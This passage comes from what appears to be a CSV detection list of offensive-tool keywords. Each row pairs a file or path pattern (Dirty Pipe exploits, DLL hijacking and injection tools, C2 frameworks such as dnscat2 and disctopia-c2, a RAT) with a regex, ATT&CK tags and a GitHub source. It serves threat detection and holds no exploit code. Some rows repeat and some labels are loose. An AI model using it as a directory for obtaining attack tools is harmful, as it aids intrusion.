TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dicom-ping.nse*",".{0,1000}\/dicom\-ping\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dict-info.nse*",".{0,1000}\/dict\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dicts/ftp_default.txt*",".{0,1000}\/dicts\/ftp_default\.txt.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*/DigitalOceanProxyTab.java*",".{0,1000}\/DigitalOceanProxyTab\.java.{0,1000}","offensive_tool_keyword","burpsuite","A BurpSuite extension to deploy an OpenVPN config file to DigitalOcean and set up a SOCKS proxy to route traffic through it","T1592 - T1021 - T1573 - T1090 - T1071","TA0005","N/A","N/A","Defense Evasion","https://github.com/honoki/burp-digitalocean-openvpn-socks","1","1","N/A","10","1","43","9","2024-02-26T13:59:20Z","2024-02-26T13:59:17Z" "*/DInjector.git*",".{0,1000}\/DInjector\.git.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10","","N/A","N/A","N/A","N/A" "*/DInvoke/*",".{0,1000}\/DInvoke\/.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*/DInvokeResolver/*",".{0,1000}\/DInvokeResolver\/.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*/dir_brute.txt*",".{0,1000}\/dir_brute\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dirbuster*",".{0,1000}\/dirbuster.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/dirbuster.py*",".{0,1000}\/dirbuster\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*/dirbuster/*",".{0,1000}\/dirbuster\/.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/DirCreate2System.git*",".{0,1000}\/DirCreate2System\.git.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","353","39","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*/DirCreate2System.git*",".{0,1000}\/DirCreate2System\.git.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","353","39","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*/direct_syscall_amd64.s*",".{0,1000}\/direct_syscall_amd64\.s.{0,1000}","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","286","33","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" "*/dirsearch.py*",".{0,1000}\/dirsearch\.py.{0,1000}","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","694","270","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" "*/Dirty-Pipe.sh*",".{0,1000}\/Dirty\-Pipe\.sh.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/imfiver/CVE-2022-0847","1","1","N/A","N/A","3","270","77","2023-02-02T02:17:30Z","2022-03-07T18:36:50Z" "*/Dirty-Pipe.sh*",".{0,1000}\/Dirty\-Pipe\.sh.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/puckiestyle/CVE-2022-0847","1","1","N/A","N/A","1","2","1","2022-03-10T08:10:40Z","2022-03-08T14:46:21Z" "*/Dirty-Pipe/main/exploit-static*",".{0,1000}\/Dirty\-Pipe\/main\/exploit\-static.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/carlosevieira/Dirty-Pipe","1","1","N/A","N/A","1","8","5","2022-03-07T21:01:15Z","2022-03-07T20:57:34Z" "*/dirtypipez.c*",".{0,1000}\/dirtypipez\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/dirtypipez.c*",".{0,1000}\/dirtypipez\.c.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/febinrev/dirtypipez-exploit","1","1","N/A","N/A","1","45","24","2022-03-08T11:52:22Z","2022-03-08T11:49:40Z" "*/dirtypipez.c*",".{0,1000}\/dirtypipez\.c.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/puckiestyle/CVE-2022-0847","1","1","N/A","N/A","1","2","1","2022-03-10T08:10:40Z","2022-03-08T14:46:21Z" "*/dirtypipez-exploit/*",".{0,1000}\/dirtypipez\-exploit\/.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/febinrev/dirtypipez-exploit","1","1","N/A","N/A","1","45","24","2022-03-08T11:52:22Z","2022-03-08T11:49:40Z" "*/DisableWD.dll,*",".{0,1000}\/DisableWD\.dll,.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*/DiscordBot.py*",".{0,1000}\/DiscordBot\.py.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","1","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*/disctopia.py*",".{0,1000}\/disctopia\.py.{0,1000}","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105 - T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","1","N/A","10","10","336","85","2024-02-10T13:46:58Z","2022-01-02T22:03:10Z" "*/disctopia-c2*",".{0,1000}\/disctopia\-c2.{0,1000}","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105 - T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","1","N/A","10","10","336","85","2024-02-10T13:46:58Z","2022-01-02T22:03:10Z" "*/DiskCryptor.git*",".{0,1000}\/DiskCryptor\.git.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","5","417","103","2024-02-23T14:13:01Z","2019-04-20T14:51:18Z" "*/dist/fw_walk.*",".{0,1000}\/dist\/fw_walk\..{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","1","N/A","10","10","99","14","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z" "*/dist:/dist_ext torat*",".{0,1000}\/dist\:\/dist_ext\storat.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*/distcc-cve2004-2687.nse*",".{0,1000}\/distcc\-cve2004\-2687\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/distopia-test*",".{0,1000}\/distopia\-test.{0,1000}","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105 - T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","0","N/A","10","10","336","85","2024-02-10T13:46:58Z","2022-01-02T22:03:10Z" "*/DKMC.git*",".{0,1000}\/DKMC\.git.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","1","N/A","10","10","1352","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z" "*/dkmc.py*",".{0,1000}\/dkmc\.py.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","1","N/A","10","10","1352","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z" "*/DLHell.git*",".{0,1000}\/DLHell\.git.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004?","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","1","N/A","9","1","92","12","2024-04-17T14:03:13Z","2024-04-17T13:00:12Z" "*/DLHell.py*",".{0,1000}\/DLHell\.py.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004?","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","1","N/A","9","1","92","12","2024-04-17T14:03:13Z","2024-04-17T13:00:12Z" "*/dll/inject/*",".{0,1000}\/dll\/inject\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/dllexploit.cpp*",".{0,1000}\/dllexploit\.cpp.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","126","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*/dllexploit.exe*",".{0,1000}\/dllexploit\.exe.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","126","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*/DllExport.bat*",".{0,1000}\/DllExport\.bat.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*/DLL-Hijack*",".{0,1000}\/DLL\-Hijack.{0,1000}","offensive_tool_keyword","cobaltstrike","DLL Hijack Search Order Enumeration BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF","1","1","N/A","10","10","129","21","2021-11-03T17:39:32Z","2021-11-02T03:47:31Z" "*/dll-hijack-by-proxying.git*",".{0,1000}\/dll\-hijack\-by\-proxying\.git.{0,1000}","offensive_tool_keyword","dll-hijack-by-proxying","Exploiting DLL Hijacking by DLL Proxying Super Easily","T1174 - T1574.007","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tothi/dll-hijack-by-proxying","1","1","N/A","7","4","395","82","2023-07-09T22:11:34Z","2020-07-08T18:11:17Z" "*/DLLHijackTest.git*",".{0,1000}\/DLLHijackTest\.git.{0,1000}","offensive_tool_keyword","DLLHijackTest","DLL and PowerShell script to assist with finding DLL hijacks","T1574.002 - T1055.001 - T1059.001 - T1036.005","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/slyd0g/DLLHijackTest","1","1","N/A","9","4","321","58","2020-10-01T22:37:36Z","2020-06-20T04:33:01Z" "*/dllinjection_rs.exe*",".{0,1000}\/dllinjection_rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/DllNotificationInjection.git*",".{0,1000}\/DllNotificationInjection\.git.{0,1000}","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","10","1","17","3","2023-08-23T13:50:27Z","2023-12-01T12:47:43Z" "*/DllProxy.git*",".{0,1000}\/DllProxy\.git.{0,1000}","offensive_tool_keyword","DllProxy","Proxy your dll exports and add some spicy content at the same time","T1574.002 - T1036.005","TA0005 - TA0004","N/A","N/A","Exploitation Tools","https://github.com/Iansus/DllProxy/","1","1","N/A","N/A","1","15","6","2023-06-28T14:19:36Z","2021-05-04T19:38:42Z" "*/dllproxy.nim*",".{0,1000}\/dllproxy\.nim.{0,1000}","offensive_tool_keyword","NimDllSideload","DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/byt3bl33d3r/NimDllSideload","1","1","N/A","9","2","157","17","2022-12-04T21:52:49Z","2022-12-03T03:25:57Z" "*/dlls/c2.c*",".{0,1000}\/dlls\/c2\.c.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1075","161","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*/DLL-Spoofer.git*",".{0,1000}\/DLL\-Spoofer\.git.{0,1000}","offensive_tool_keyword","DLL-Spoofer","POC for a DLL spoofer to determine DLL Hijacking","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/MitchHS/DLL-Spoofer","1","1","N/A","9","1","60","7","2023-10-18T14:55:15Z","2023-10-18T14:34:38Z" "*/dns_grabber.*",".{0,1000}\/dns_grabber\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*/dns_spoof*",".{0,1000}\/dns_spoof.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*/dns2tcp.git*",".{0,1000}\/dns2tcp\.git.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","1","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" "*/dns2tcp/client/*",".{0,1000}\/dns2tcp\/client\/.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" "*/dns2tcp/common/*",".{0,1000}\/dns2tcp\/common\/.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" "*/dns2tcp/server*",".{0,1000}\/dns2tcp\/server.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" "*/dns-black-cat.git*",".{0,1000}\/dns\-black\-cat\.git.{0,1000}","offensive_tool_keyword","dns-black-cat","Multi platform toolkit for an interactive DNS shell commands exfiltration - by using DNS-Cat you will be able to execute system commands in shell mode over DNS protocol","T1140 - T1048.003 - T1071.004","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/lawrenceamer/dns-black-cat","1","1","N/A","10","10","104","20","2022-09-15T18:07:05Z","2021-02-13T11:31:22Z" "*/dns-blacklist.nse*",".{0,1000}\/dns\-blacklist\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dns-brute.nse*",".{0,1000}\/dns\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dns-cache-snoop.nse*",".{0,1000}\/dns\-cache\-snoop\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dnscan.git*",".{0,1000}\/dnscan\.git.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","1","N/A","6","10","1076","410","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" "*/dnscan.py*",".{0,1000}\/dnscan\.py.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","1","N/A","6","10","1076","410","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" "*/dnscat.c*",".{0,1000}\/dnscat\.c.{0,1000}","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3256","587","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z" "*/dns-cat.exe*",".{0,1000}\/dns\-cat\.exe.{0,1000}","offensive_tool_keyword","dns-black-cat","Multi platform toolkit for an interactive DNS shell commands exfiltration - by using DNS-Cat you 